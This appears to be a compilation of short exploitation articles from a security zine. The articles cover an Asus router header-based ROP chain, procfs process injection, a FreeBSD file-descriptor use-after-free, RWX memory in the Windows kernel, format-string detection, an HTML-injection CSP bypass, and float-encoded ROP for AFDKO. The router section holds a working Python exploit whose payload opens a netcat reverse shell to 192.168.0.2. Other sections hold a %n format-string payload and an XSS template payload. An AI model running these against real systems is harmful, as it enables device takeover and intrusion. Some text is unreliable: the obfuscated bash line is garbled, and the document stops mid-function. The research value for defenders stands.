Turns out that if we scroll the stack after the crash long enough we find the HTTP request headers. Each header is parsed by the firmware separately and each header can end with its own fancy, shiny null byte. This could be used as a return address. Fortunately, there actually are some gadgets that allow us to slightly adjust the stack register and change PC to align with these headers! Header ROP chain, I guess? Here, have some exploit code⁴.


#!/usr/bin/python
# Python 2: struct.pack() returns a str here, so it concatenates with the "A" padding.
import struct, urllib3

# Gadgets in httpd (see footnote 4 for the tested firmware build):
# 00019294 add sp,sp,#0x800; pop {r4, r5, r6, r7, pc};   -- moves sp up into the parsed headers
# 0003cea4 cpy r0,sp
# 0003cea8 bl system                                      -- runs the string at sp as a command

cmd = 'nc 192.168.0.2 4444 -e /bin/sh'
cmd = ';' + cmd + ';'     # semicolons separate the command from the rest of the cookie

align = "A" * 199         # padding so the header contents line up after the sp adjustment

payload = "A" * 532       # bytes before the saved PC in the 'flag' parameter
payload += struct.pack("<I", 0x00019294)   # first gadget

url = "https://192.168.0.1:8443/blocking.asp"
params = {'flag': payload}

headers = {
    'Accept':
        ('text/html, application/xhtml+xml, application/xml;'
         'q=0.9, image/webp, */*;q=0.8'),
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    # r4..r7 get VVVV/WWWW/XXXX/YYYY, pc gets the second gadget
    'User-Agent': align + "VVVV" + "WWWW" + "XXXX" +
                  "YYYY" + struct.pack("<I", 0x0003cea4),
    'Connection': 'close',
    'Cookie': cmd + 'clickedItem_tab=0',   # what the second gadget hands to system()
    'Upgrade-Insecure-Requests': '1'}

http = urllib3.PoolManager()
r = http.request('GET', url, fields=params, headers=headers)


3. I could probably leak some PLT address or something, but whatever. Who the hell do you think I am, Geohot?


4. Tested on Merlin RT-AC68U_384.3_0. The stock firmware PC overwrite offset may vary, but AFAIK the gadget addresses stay the same. Regular Asus firmware does not have netcat, so consider using 'touch /tmp/home/root/1' for the PoC instead.


ichervatyuk@gmail.com 
https://github.com/outofhere 
PIDU - Process Injection and Dumping Utility


#!/bin/bash 

# Process Injection and Dumping Utility, created by reenz@h years ago :) 

TW: @sektor7net 

README : 

Imagine you want to change a process running in memory, but you don't have gdb at hand. GNU/Linux is a flexible OS with an (almost) everything-is-a-file philosophy. One of its cool features is procfs, giving the user access to processes' kernel structures via a pseudo-filesystem. There are 2 files that expose both data and metadata of a process: /proc/<pid>/maps and /proc/<pid>/mem. The former contains the memory layout with access permissions, the latter is a gateway to the process' contents, its memory pages (see procfs(5)).

You can leverage both the maps and mem files to change any running process (keep in mind you need appropriate permissions to do that, see ptrace(2)).

Here enters PIDU: a tool using only bash, procfs and dd to modify a process. It reads the process layout exposed in maps and uses dd to read/write memory pages via the mem file. With PIDU you can dump the .text segment of a process, modify it on disk (i.e. inject some shellcode with dd) and load it back into the original process. Of course you need to take process state changes into account while doing so.

If you want to know how exactly the tool works, you will have to crack the obfuscation to find out. Or maybe not... GOOD LUCK!

s=‘egrep -A30@ "4e.*z\)$" ${@}|tail +2|tr -d "\n"*;f=;c=;for ((1=0;i<${#s};i++));do [ $\ 
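As an added example (not PIDU's own code), the same procfs approach in Python: parse /proc/<pid>/maps, derive the dd arguments PIDU would use for a region, and read the region straight out of /proc/<pid>/mem. The maps excerpt at the bottom is constructed, and the self-run at the end reads the script's own process because reading another one needs ptrace access.

```python
"""Read a process's memory through procfs, as PIDU's README describes.

Added example (not PIDU's own code): parse /proc/<pid>/maps, turn a region
into the GNU dd arguments PIDU would use, and pread() the same bytes from
/proc/<pid>/mem.  Reading another process needs ptrace access (ptrace(2)),
so the __main__ demo reads its own process.
"""
import os
import re
from dataclasses import dataclass

# "start-end perms offset dev inode [path]" (procfs(5)).
MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+(\S+)\s+(\d+)\s*(.*)$")


@dataclass
class Region:
    start: int
    end: int
    perms: str     # e.g. "r-xp": read, write, execute, private/shared
    path: str      # file, "[stack]", "[heap]" or "" for anonymous memory

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_maps(text: str) -> list:
    """Region objects for every well-formed line of a maps file."""
    regions = []
    for line in text.splitlines():
        m = MAPS_RE.match(line.strip())
        if m:
            regions.append(Region(int(m.group(1), 16), int(m.group(2), 16),
                                  m.group(3), m.group(7).strip()))
    return regions


def dd_command(pid: int, region: Region, out: str) -> str:
    """The GNU dd line that dumps `region` from /proc/<pid>/mem into `out`."""
    # skip_bytes/count_bytes keep skip and count in bytes regardless of bs.
    return (f"dd if=/proc/{pid}/mem of={out} bs=4096 iflag=skip_bytes,count_bytes "
            f"skip={region.start} count={region.size}")


def dump_region(pid: int, region: Region) -> bytes:
    """Same read without dd: the mem file is addressed by virtual address."""
    fd = os.open(f"/proc/{pid}/mem", os.O_RDONLY)
    try:
        return os.pread(fd, region.size, region.start)
    finally:
        os.close(fd)


def text_region(pid: int) -> Region:
    """First executable mapping: the .text PIDU dumps, patches and writes back."""
    with open(f"/proc/{pid}/maps") as f:
        return next(r for r in parse_maps(f.read()) if "x" in r.perms)


# Constructed maps excerpt (not captured from a real host), for the parser.
SAMPLE_MAPS = (
    "55d1c0a00000-55d1c0a2c000 r-xp 00020000 08:01 1234567 /usr/bin/bash\n"
    "7ffd2e1f0000-7ffd2e211000 rw-p 00000000 00:00 0       [stack]\n"
    "7f3a10000000-7f3a10021000 rw-p 00000000 00:00 0\n")

if __name__ == "__main__":
    me = os.getpid()
    r = text_region(me)
    print(dd_command(me, r, "text.bin"))
    print(f"{r.path} {r.start:#x}-{r.end:#x}: {len(dump_region(me, r))} bytes read")
```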
Exploiting FreeBSD-SA-19:02.fd


Karsten König of Secfault Security

FreeBSD 12.0 introduced a vulnerability in the handling of file descriptors¹. The advisory stated that it would allow escalating privileges to root or escaping a FreeBSD jail. This note catches up on the general scenario that was created by this bug and introduces a novel technique to delay writes in the FreeBSD kernel to create a TOCTOU-like exploit in order to escalate to root.


1 Introduction


2 The Bug Class 


Without going into the details, the scenario created by the kind of bugs described in the advisory shall be explained. The bug consisted of an overflow of the reference counter variable f_count in the C struct struct file, which is used to manage file operations. The variable is used to count the file descriptors which reference the struct. If the attacker is able to wrap the counter back to 1 while actually holding more than one file descriptor to the struct file object, this can lead to a use-after-free situation: by closing one descriptor after the wrap, the struct is freed by the kernel² while the other file descriptors still reference the freed struct on the heap. In the special case of FreeBSD, the struct is freed to the Files allocator zone³. Therefore, the bug only allows for dangling references to other objects in this zone. For example, by opening another file after the free() operation, an attacker could use the dangling file descriptors to write to the newly opened file (even though the descriptors previously pointed to a different file).


3 Way to Exploitation 


Exploiting this for a privilege escalation was a bit tricky. It was not easily possible to turn this bug into a memory corruption issue that could be exploited via ROP or other techniques in the way fail0verflow did for the PS4⁴. This is due to the fact that, other than in the PS4 scenario, the f_data pointer of the struct file is not corrupted in this case.

However, it is possible to start a write to a user-owned file, wait until after all required checks are performed and then exchange the file referenced by the used file descriptor with another file the user should not be able to write to⁵.


1. https://www.freebsd.org/security/advisories/FreeBSD-SA-19:02.fd.asc
2. https://ruxcon.org.au/assets/2016/slides/ruxcon2016-Vitaly.pdf
3. http://phrack.org/issues/66/8.html
4. https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/

If a file is opened writable, a flag in the struct file 
is set to indicate this. This is only possible if the user 
has the correct access privileges for the file. The write() 
syscall will only check this flag to assert that the file 
referenced by the descriptor is writable. 

After performing this check, the syscall will eventually 
call the function bwillwrite () before the actual write op- 
eration happens on the file system. bwillwrite() will 
put the kernel to sleep without timeout if there are 
too many dirty (that is, unwritten) buffers. This cre- 
ates a TOCTOU-like race condition if the attacker is 
able to exchange the struct file during this sleep be- 
cause the kernel will not check again if the file is opened 
writable. The use-after-free primitive introduced by the 
mentioned vulnerability makes this possible. 

Therefore any file, even if the attacker is only able to 
open it read-only, will be written to in this scenario. 

To trigger the sleep in the kernel, a lot of file streams 
are opened via fopen() in multiple processes with multi- 
ple threads. After each call to fopen(), the correspond- 
ing file is unlinked. When all streams are open, a signal 
is given to start a write to these in parallel. This will 
create a lot of dirty buffers really fast. 

If the write to an attacker-writable file happens at 
that moment, bwillwrite() will delay the write opera- 
tion. This renders the race condition exploitable com- 
bined with a use-after-free for struct file objects. For 
example, the user could trigger the bug and open the 
read-only file libmap.conf to gain root like kcope did 
in 2005⁶. 
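An added model of the bug class and of the write window described above (not code from the advisory or from this note): the counter width, the file names and the saturating counter used as the hardened variant are all assumptions made for the illustration.

```python
"""Model of the FreeBSD-SA-19:02.fd bug class: an f_count wrap on struct
file turning into a use-after-free, and the window that bwillwrite() opens
between write()'s writable check and the write itself.

Added example (not the advisory's or the note's code): a toy in-memory
"kernel" with a COUNTER_BITS-wide reference counter so the wrap is reached
after a few hundred dup() calls.  The hardened variant refuses to take a
reference once the counter is saturated (an assumed defence, for illustration).
"""
COUNTER_BITS = 8                          # constructed width; the real f_count is wider
COUNTER_MAX = (1 << COUNTER_BITS) - 1


class File:
    """The struct file: shared by every descriptor that dup()s it."""
    def __init__(self, path, writable, content=b""):
        self.path, self.writable, self.content = path, writable, content
        self.f_count = 1                  # descriptors referencing this struct


class Kernel:
    def __init__(self, saturate):
        self.saturate = saturate          # True: overflow-checked counter
        self.fdtable, self.next_fd = {}, 3
        self.zone = []                    # freed struct file objects (the Files zone)
        self.disk = {}                    # path -> content, to observe the effect

    def _install(self, f):
        fd, self.next_fd = self.next_fd, self.next_fd + 1
        self.fdtable[fd] = f
        return fd

    def open(self, path, writable):
        f = self.zone.pop() if self.zone else File.__new__(File)   # zone reuse
        f.__init__(path, writable, self.disk.setdefault(path, b""))
        return self._install(f)

    def dup(self, fd):
        f = self.fdtable[fd]
        if f.f_count == COUNTER_MAX:
            if self.saturate:
                raise OSError("f_count saturated, reference refused")
            f.f_count = 0                 # the bug: the counter silently wraps
        f.f_count += 1
        return self._install(f)

    def close(self, fd):
        f = self.fdtable.pop(fd)
        f.f_count -= 1
        if f.f_count == 0:                # "last" reference as far as the kernel knows
            self.zone.append(f)           # freed; stale descriptors still point here

    def write_begin(self, fd):
        """First half of write(): the only place the writable flag is checked."""
        f = self.fdtable[fd]
        if not f.writable:
            raise PermissionError(f.path)
        return f                          # then bwillwrite() may sleep for a long time...

    def write_finish(self, f, data):
        """...and afterwards the data goes to whatever struct file f is by now."""
        f.content += data
        self.disk[f.path] = f.content


def scenario(saturate):
    """Wrap f_count on an attacker-writable file, then have the struct file
    replaced by a read-only one inside the write window.  Returns (outcome, secret)."""
    k = Kernel(saturate)
    k.disk["/etc/secret"] = b"root:only\n"          # constructed read-only target
    mine = k.open("/tmp/mine", writable=True)
    try:
        extra = [k.dup(mine) for _ in range(COUNTER_MAX)]   # 256 fds, f_count back to 1
    except OSError:
        return "blocked", k.disk["/etc/secret"]
    pending = k.write_begin(mine)         # check passes: /tmp/mine is writable
    k.close(extra[-1])                    # f_count 1 -> 0: struct freed, `mine` dangles
    k.open("/etc/secret", writable=False) # recycles the freed struct from the zone
    k.write_finish(pending, b"evil\n")    # the write lands in the read-only file
    return "written", k.disk["/etc/secret"]
```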


4 Conclusion & Challenges 


This concludes the note. It appears elegant that a way was found to exploit use-after-free bugs for struct file objects in FreeBSD in general.

However, the most urgent challenge is to create a more 
universal exploit as the delay technique only works with 
UFS at the moment but ZFS is nowadays widely adopted 
on FreeBSD installations. 

A more detailed write-up for the interested reader and a full exploit for the advisory are available⁷.

If you want to get in touch, feel free: @gr4yf0x at 
Twitter or karsten@secfault-security.com. 


5. Jann Horn used a similar approach in 2016: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
6. https://www.exploit-db.com/exploits/1230
7. https://secfault-security.com/blog/FreeBSD-SA-1902.fd.html
Semantic gap


by Honorary_BoT 


The other day I was walking. Walking page tables, of course. On Windows. On an Intel x64 CPU.


Every time I try to exploit something, I avoid using known gadgets or techniques. Instead, I prefer getting to know the execution environment, like what is there in the address space, which properties it has and so on. I am also lazy, so I look for the easiest way possible.


I needed RWX memory in the kernel. I was aware that Microsoft does a really good job with mitigations and was not expecting any. But anyway, I decided to scan the Windows page tables.


I was not using any specifics of the Windows memory manager; I skipped software PTEs. My idea was doing it the hardware way: if the page has the P bit set in its PTE, then the mapping is there, no matter what semantics Windows puts on that memory.


I used PulseDbg, a hypervisor-based debugger, for that. This way ensures the OS is frozen and not modifying the page tables on the fly. For the scanning process itself refer to the Offzone 2019 presentation "(Mis)configuring page tables"¹ or, even better, to the Intel Software Developer's Manual (Vol 3, Chapter 4); it has all the details. In fact, the SDM has everything, so always refer to it. I would also suggest you read it before you go to bed.


Surprise! The Windows kernel does have RWX regions of memory. In my case it was Windows 10 1809, and an Intel Haswell CPU on a Gigabyte Q87 chipset motherboard; let me explain why it matters.


The first thing I identified was an area with UEFI Runtime Services being mapped as RWX. It is because the firmware typically doesn't set the protection on loaded modules, and Windows is not aware of the semantics of the firmware loader. The only option for the OS is to rely on the firmware for those services to work.




The HAL keeps the UEFI Runtime function pointer table at hal!HalEfiRuntimeServicesBlock. Those functions can be triggered from user mode, for instance by launching "System Information", which would trigger reading a UEFI variable.


The good news is if you use Microsoft Surface 
devices, you’re fine, since MSFT firmware assigns 
protection to UEFI modules. Good job, Microsoft! 


Besides that, some drivers create custom allocations as RWX, which is inevitable, I guess. But not for the MmMapIoSpace function, which has an interesting behavior. Check out the prototypes:


PVOID MmMapIoSpace(PHYSICAL_ADDRESS PhysicalAddress, SIZE_T NumberOfBytes, MEMORY_CACHING_TYPE CacheType);

PVOID MmMapIoSpaceEx(PHYSICAL_ADDRESS PhysicalAddress, SIZE_T NumberOfBytes, ULONG Protect);


The first one is the legacy one; the "Ex" one is only available on Windows 10. Third party drivers would use the old one. There is an implicit mapping between the specified caching type and the protection:


- MmNonCached converted to RWX
- MmCached converted to RWX
- MmWriteCombined converted to RW


So, the driver must decide if it wants backward 
compatibility, or a fine-grained protection of the 
mapping. 


The good news again is that there is Virtualization-Based Security. Virtual Secure Mode uses hardware virtualization features for the security and protection of Windows 10. It has W^X enforcement in EPT (extended page tables), controlled by the hypervisor. It does not allow guest kernel memory to be both writable and executable at the same time. If you're concerned about your Windows security, you should definitely turn VBS on.


There are more RWX regions present in the kernel. 
If you’re interested, then take a walk. On page 
tables, of course. 
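An added example, not the author's PulseDbg scan: decoding x64 leaf page-table entries with only the architectural bits from the SDM and flagging the present ones that are RWX, the "hardware way" the article takes. The table of entries and the addresses in it are constructed.

```python
"""Decode x64 page-table entries using only the architectural bits.

Added example (not the author's PulseDbg scan): the bit positions are from
Intel SDM Vol. 3, chapter 4 (4-level paging); any OS-specific software PTE
format is ignored, exactly as the article does.  SAMPLE_TABLE is a
constructed {virtual address: PTE value} dict, not a real Windows dump.
"""
PTE_P = 1 << 0       # present: a hardware mapping exists, whatever the OS calls it
PTE_RW = 1 << 1      # writable
PTE_US = 1 << 2      # user-accessible (else supervisor only)
PTE_PS = 1 << 7      # in a PDE/PDPTE: large page
PTE_XD = 1 << 63     # execute-disable (effective when IA32_EFER.NXE is set)
PFN_MASK = 0x000F_FFFF_FFFF_F000   # bits 12..51: physical frame


def split_va(va: int) -> tuple:
    """(PML4 index, PDPT index, PD index, PT index, page offset) of a VA."""
    return ((va >> 39) & 0x1FF, (va >> 30) & 0x1FF, (va >> 21) & 0x1FF,
            (va >> 12) & 0x1FF, va & 0xFFF)


def perms(pte: int) -> str:
    """'absent' when P is clear (software PTE or unmapped), else e.g. 'rwx'."""
    if not pte & PTE_P:
        return "absent"
    return "r" + ("w" if pte & PTE_RW else "-") + ("-" if pte & PTE_XD else "x")


def decode(pte: int) -> dict:
    return {"perms": perms(pte), "pfn": (pte & PFN_MASK) >> 12,
            "user": bool(pte & PTE_US), "large": bool(pte & PTE_PS)}


def rwx_mappings(table: dict) -> list:
    """Virtual addresses whose leaf entry is present, writable and executable."""
    return sorted(va for va, pte in table.items() if perms(pte) == "rwx")


# The article's MmMapIoSpace rule: the caching type implies the protection.
MMAPIOSPACE_PROTECTION = {"MmNonCached": "rwx", "MmCached": "rwx",
                          "MmWriteCombined": "rw-"}

# Constructed leaf entries (not from a real machine).
SAMPLE_TABLE = {
    0xFFFF_F800_0010_0000: 0x0000_0000_1234_5063,   # P, RW, XD clear -> rwx
    0xFFFF_F800_0020_0000: 0x8000_0000_1234_6063,   # P, RW, XD set   -> rw-
    0xFFFF_F800_0030_0000: 0x8000_0000_1234_7021,   # P, read-only, XD -> r--
    0xFFFF_F800_0040_0000: 0x0000_0000_1234_8025,   # P, user, RO, no XD -> r-x
    0xFFFF_F800_0050_0000: 0x0000_0000_0000_0000,   # not present     -> absent
}

if __name__ == "__main__":
    for va in rwx_mappings(SAMPLE_TABLE):
        print(f"{va:#x} {decode(SAMPLE_TABLE[va])}")
```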


1. https://offzone.moscow/report/mis-configuring-page-tables/ 


Twitter: @honorary_bot 


Using Binary Ninja to find format 
string vulns in Binary Ninja 


1 Motivation 


While targeting a bug bounty program, my fuzzer 
found a format string vulnerability. 

You mean you found a format string vuln 
in 2019? YUP! 

Surely not exploitable right? Aaahhhh, 
it was! The binary wasn’t compiled with FOR- 
TIFY_SOURCE or PIE, and even though it was 
a one-shot exploit, with some tricks I was able to 
get quite a reliable exploit (~90% reliability). Un- 
fortunately I’m not able to share more details yet. 

After this finding, I wanted to look for similar 
vulnerabilities, and so I decided to create a plugin 
in Binary Ninja to find format string vulns stati- 
cally. 


2 How it works 


The main idea behind the plugin is that the for- 
mat argument has to be a constant and read- 
only address. Cases like printf("Hello %s") fall 
in this category (the string comes from the .rodata 
section), but others such as printf (user_input) 
don’t, because the format argument comes from a 
stack or heap variable. 

To start, we load all known printf-like functions, i.e. functions that have a format argument, together with the index of this argument (e.g. printf->arg0, sprintf->arg1, ...).


Secondly, we iterate over the xrefs of all the printf-like functions to determine whether the format argument comes from a safe origin or not. Using Binary Ninja's medium level intermediate language (MLIL) in SSA form, we create a backwards slice, starting from the format argument and tracing all the way back to its origin(s) in the current function (no inter-procedural analysis).

1. If the origin is an argument, we add this 
function to the printf-like functions list for further 
analysis. For example: 


#include <stdarg.h>
#include <stdio.h>

void PRINTF_LIKE_1(char *fmt, ...) {
    va_list args;
    va_start(args, fmt);
    vprintf(fmt, args);   /* fmt is passed straight through to a printf-like function */
    va_end(args);
}


jofra 
It is very important that we find these custom 
printf-like functions, because the compiler won’t 
output a warning when calling them without a 
string literal (as would be the case for known func- 
tions like printf), making them more likely to be 
vulnerable. 

2. If the origin is a constant and read-only 
address, we mark the call as safe. 

3. If the origin is the result of a known 
safe function call we also mark the call as 
safe. In this list we have all functions from 
the gettext family, which attempt to translate a 
text string into the user’s native language. If we 
were able to control the translation files (located 
in /usr/share/locale/<lang>/LC_MESSAGES), we 
would be able to trigger format strings, however 
these files are owned by root, and so we consider 
these to be safe. 

4. For any other origin we mark the call as 
vulnerable. 
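An added toy of the four rules above (not the plugin's code): a hand-made SSA IR stands in for Binary Ninja's MLIL SSA, and the program, the function names and the .rodata range are constructed. It also shows the printf-like list growing when a format argument turns out to be a parameter.

```python
"""Toy version of the plugin's origin classification.

Added example, not the Binary Ninja plugin's code: a tiny hand-made SSA IR
replaces MLIL SSA, but the four rules from the write-up are applied to the
format argument of every printf-like call, and the printf-like table grows
when a format argument is a function parameter.  PROGRAM and RODATA are
constructed.
"""
from dataclasses import dataclass

PRINTF_LIKE = {"printf": 0, "sprintf": 1, "fprintf": 1}  # name -> format arg index
SAFE_SOURCES = {"gettext", "dgettext", "ngettext"}        # gettext family (rule 3)
RODATA = range(0x2000, 0x3000)                            # constructed .rodata span


@dataclass
class Insn:
    dest: str          # SSA variable defined; "" for a call used as a statement
    op: str            # "const", "call", "copy", "phi", "stack", "heap"
    args: tuple = ()   # const: (address,); call: (callee, *arg vars); copy/phi: vars


@dataclass
class Function:
    name: str
    params: list
    body: list


def origins(func, var, defs, seen=None):
    """Backward slice of `var` to its origin(s) within `func` (intra-procedural)."""
    seen = set() if seen is None else seen
    if var in seen:
        return set()
    seen.add(var)
    if var in func.params:
        return {("arg", func.params.index(var))}
    insn = defs[var]
    if insn.op == "const":
        return {("rodata" if insn.args[0] in RODATA else "data", insn.args[0])}
    if insn.op == "call":
        return {("call", insn.args[0])}
    if insn.op in ("copy", "phi"):
        return set().union(*(origins(func, a, defs, seen) for a in insn.args))
    return {(insn.op, var)}                       # stack or heap variable


def classify(origin_set):
    """Rules 1-4 from the write-up; any unsafe origin makes the call vulnerable."""
    if any(kind == "arg" for kind, _ in origin_set):
        return "printf-like"                                            # rule 1
    if all(kind == "rodata" or (kind == "call" and what in SAFE_SOURCES)
           for kind, what in origin_set):
        return "safe"                                                   # rules 2, 3
    return "vulnerable"                                                 # rule 4


def analyze(functions):
    """Classify every call site; returns (findings, final printf-like table)."""
    known = dict(PRINTF_LIKE)
    while True:
        findings, grew = [], False
        for f in functions:
            defs = {i.dest: i for i in f.body if i.dest}
            for i in f.body:
                if i.op != "call" or i.args[0] not in known:
                    continue
                fmt_idx = known[i.args[0]]
                if fmt_idx + 1 >= len(i.args):
                    continue                      # call site passes too few args
                origin_set = origins(f, i.args[fmt_idx + 1], defs)
                verdict = classify(origin_set)
                if verdict == "printf-like" and f.name not in known:
                    known[f.name] = next(idx for kind, idx in origin_set if kind == "arg")
                    grew = True                   # re-run so callers of f are checked
                findings.append((f.name, i.args[0], verdict))
        if not grew:
            return findings, known


# Constructed program: a vprintf-style wrapper plus a few call sites in main.
PROGRAM = [
    Function("log_msg", ["fmt", "x"], [
        Insn("", "call", ("printf", "fmt", "x"))]),          # custom printf-like
    Function("main", ["argc", "argv"], [
        Insn("c1", "const", (0x2010,)),                       # "Hello %s" in .rodata
        Insn("", "call", ("printf", "c1")),                   # safe
        Insn("u1", "stack", ()),                              # buffer holding user input
        Insn("", "call", ("printf", "u1")),                   # vulnerable
        Insn("t1", "call", ("gettext", "c1")),
        Insn("", "call", ("printf", "t1")),                   # safe (rule 3)
        Insn("", "call", ("log_msg", "u1", "c1")),            # vulnerable via wrapper
        Insn("p1", "phi", ("c1", "u1")),
        Insn("", "call", ("printf", "p1"))]),                 # vulnerable on one path
]
```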


3 Fun fact 


So, just before releasing the plugin I decided to run 
it against Binary Ninja itself and to my surprise it 
actually found a vulnerability. 

Whenever a plugin failed to load, an error message was displayed. This message was built as the concatenation of "Failed to enable plugin:\n", PLUGIN_NAME and "\nCheck the log for more details" and passed to the function BinaryNinja::LogAlert, a printf-like function. Since the plugin name was being used in a format argument, the code was vulnerable to a format string vulnerability.

It was quite funny that I was submitting a plugin to find format strings and the plugin name field was vulnerable to format strings; however, there was no real impact, since plugins are manually accepted by the Binary Ninja team, and more importantly, the binary was compiled with FORTIFY_SOURCE, making format strings close to unexploitable. I also suspect a plugin named 
%115c%6$n%20%7$n%238cC%8S$n%5c%V9$n 
%247c%10$n%20%11$n%2540%12$n%15c% 
13$n%251c%14$n%5c%15$n%2520%16$n%2 
47c%17$n would raise a little suspicion. 


https://github.com/Vasco-jofra/format-string-finder-binja 
Injecting HTML: Beyond XSS


Let's take a look at this example web app:


<html>
<meta http-equiv="Content-Security-Policy"
      content="script-src 'nonce-...' 'unsafe-eval'">
<div id="template_target"></div>

<script type="application/template" id="template">
Hello World! 1 + 1 = {{ 1 + 1 }}
</script>

Your search is <?php echo $_GET['q']; ?>

<script nonce="...">
let template = document.getElementById('template');
template_target.innerHTML = template.innerText.replace(/{{(.*)}}/g, eval)
</script>
</html>


This functionality mirrors some of what you may see in modern templated web apps. Some privileged template is stored on the page, then its content is processed and turned into HTML. In this case it will read the content of the HTML element with id "template", execute anything within the {{ mustache }} brackets, and then render the result in a separate element.

The second feature of this app is to print a URL parameter on the page. This introduces a vulnerability that would normally lead to XSS due to injected HTML tags. However, the presence of the Content-Security-Policy prevents an attacker from executing JavaScript. Since we cannot run JavaScript directly, let's see what other strange things can be accomplished. Potentially we may want to force the page to run our own template, since this would allow us to use the eval function.

It might be tempting to try and provide our own element with id="template". However, HTML ids are unique, so document.getElementById('template') will only select the first element and not our injected one.

So what do we do? It turns out browsers are often very inconsistent, so it is always better to check our assumptions. Let's try every tag just to be sure. Here we have a jinja2 page that will render a set of tags:


<div id="template">First Tag</div>
{% for tag in tag_list %}
<{{tag}} id="template">{{tag}}</{{tag}}>
{% endfor %}
<script>console.log(document.getElementById('template'));</script>


When we run this we get a strange outcome: the selected tag is an <html> tag and not the original <div>. This <html> seems to have changed what element the id "template" references. Let's take a look at the HTML elements in the DOM before and after injecting <html id="template">:


Raw HTML Source Before Parsing:

<div id="template"></div>
<html id="template"></html>

DOM After Parsing:

<html id="template">
  <head></head>
  <body>
    <div id="template"></div>
  </body>
</html>


It appears that the injected <html> tag has been moved to the top of the page. (This trick even works in all major browsers!) Now getElementById('template') will reference our injected data rather than the original element. At this point we can run our own templates and easily get JavaScript code execution:


?q=<html id="template">{{ alert("xss") }}</html> 


So due to a browser quirk we managed to bypass the CSP and achieve XSS! Try it out on this challenge¹.

1. http://xss.stackchk.fail/


https://twitter.com/itszn13 Amy Burnett 
Building ROP with floats and OpenType


by Mateusz Jurczyk (j00ru) 


Background 


The Adobe Font Development Kit for OpenType is a font processing engine dating back to at least 2000. It is written in C, and was open-sourced by Adobe in 2014 on GitHub¹. It became an attack surface when parts of AFDKO were included in Microsoft DirectWrite starting with Windows 10 1709, to facilitate the printing of so-called variable fonts (e.g. in web browsers).

This year, I reported a number of bugs in the library, with the 10 most severe ones being fixed by Microsoft in the July 2019 Patch Tuesday². Many of them were convenient for exploitation, due to the software storing the CharString execution context in a giant t2cCtx structure on the stack. Some of the primitives allowed controlled out-of-bounds writes, making it possible to skip the /GS cookie and overwrite the return address directly. Furthermore, we could perform arbitrary arithmetic operations such as multiplication or division in the OpenType "virtual machine". The only problem was that all calculations were performed on 32-bit floats (afdko/c/public/lib/source/t2cstr/t2cstr.c):


struct /* Operand stack */
{
    long cnt;
    float array[CFF2_MAX_OP_STACK];
    ...
} stack;


Moreover, data could be pushed on the stack by op- 
code 255, which loads a 32-bit integer from the Open- 
Type program stream and converts it from an assumed 
16.16 fixed point value to a float: 


long value;
CHKSUBRBYTE(h);
value = *next++;
CHKSUBRBYTE(h);
value = value << 8 | *next++;
...
PUSH(value / 65536.0);


The most basic elements of a ROP chain are constant values, e.g. fixed function arguments. The question is: how to construct a float with a given binary representation, given the above capabilities? Let's recap the format of IEEE 754 single precision numbers:


[Figure: IEEE 754 single precision layout, bit 31 down to bit 0: Sign (1 bit) | Exponent (8 bits) | Mantissa (23 bits)]


1. https://github.com/adobe-type-tools/afdko
2. https://twitter.com/j00ru/status/1148883124463505408


Mateusz Jurczyk


SAA-ALL 0.0.5


Zero, infinity and NaN 


Binary zero is the same as a floating point 0.0, while 0x80000000 can be created by negating it. Infinity is represented by exponent = 128 (let's call it e, calculated as the encoded exponent minus 127) and mantissa = 0 (m in short), which corresponds to 0x7f800000 for inf and 0xff800000 for -inf. They can be created with a simple expression:


$\pm 1 / 0$


Basic quiet NaN, which has the values 0x7fc00000 and 0xffc00000 (e = 128, m = 2²², sign controlled), is generated similarly:


All other NaNs between 0x7f800001-0x7fffffff and 0xff800001-0xffffffff cannot be generated using floating point arithmetic. One has to accept it when crafting a ROP chain in the AFDKO environment.


Real numbers 


Encoding most values in the 32-bit integer range can be achieved as follows. The first number pushed on the stack is used to set up the sign bit and the 23 bits of mantissa. For 0xdeadc0de, we'd use -22240.43359375 (0xA91F9100 as Fixed16.16), which is represented as 0xc6adc0de in binary. At this point, the only inaccurate part is the exponent, currently equal to 14 (encoded as 14 + 127 = 141), with an intended value of 62. It can be manipulated by multiplying and dividing the value by 2ⁿ, for 0 ≤ n ≤ 14 in our case, because of the 16.16 encoding and one bit reserved for the sign. In summary, the 0xdeadc0de dword can be constructed by implementing the following expression in an OpenType charstring:


$-22240.43359375 \cdot (2^{14})^{3} \cdot 2^{6}$


The above scheme works for all canonical numbers, i.e. floating points with exponent ≠ -127 (0x00800000-0x7f7fffff and 0x80800000-0xff7fffff). The only other corner case to consider is denormalized numbers (when e = -127). They are smaller than normal numbers, and are interpreted differently in that they don't have an implicit leading 1. Instead of adding extra logic to handle them in my converter, I decided to "cheat" and solve the problem for a bigger value:


$\mathrm{Convert}(x_{denormal}) = \frac{\mathrm{Convert}(2^{14} \cdot x_{denormal})}{2^{14}}$


After a maximum of two recursive calls, the argument 
becomes a normal number and can be handled using the 
regular logic described above. 
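An added converter implementing the scheme described above for zero, normal and denormal values (not j00ru's released converter; inf and NaN are left out). It emits abstract push/mul/div ops for the charstring VM and replays them with float32 rounding to check that the bit pattern comes out right.

```python
"""Build a float with a chosen bit pattern out of 16.16 fixed-point pushes
and power-of-two multiplications/divisions, as the article describes.

Added example, not j00ru's converter: it emits an abstract op list for the
charstring VM (push of a signed 32-bit Fixed16.16, mul, div, neg), then
replays it with float32 rounding to verify the result.  Zero, normals and
denormals are handled; inf and NaN are out of scope here.
"""
import struct

MAX_POW = 14        # 2**14 is 2**30 as Fixed16.16, the largest pushable power of two


def f32(x: float) -> float:
    """Round a double to the nearest IEEE 754 single, like the VM's float ops."""
    return struct.unpack("<f", struct.pack("<f", x))[0]


def to_bits(x: float) -> int:
    return struct.unpack("<I", struct.pack("<f", x))[0]


def from_bits(d: int) -> float:
    return struct.unpack("<f", struct.pack("<I", d))[0]


def scale_ops(steps: int) -> list:
    """Multiply (steps > 0) or divide (steps < 0) by 2**|steps|, 2**14 at a time."""
    op = "mul" if steps > 0 else "div"
    ops, left = [], abs(steps)
    while left:
        n = min(MAX_POW, left)
        ops += [("push", (1 << n) << 16), (op,)]      # 2**n as Fixed16.16
        left -= n
    return ops


def convert(target: int) -> list:
    """Ops whose replay yields the float whose 32-bit pattern is `target`."""
    sign = target >> 31
    exp = (target >> 23) & 0xFF
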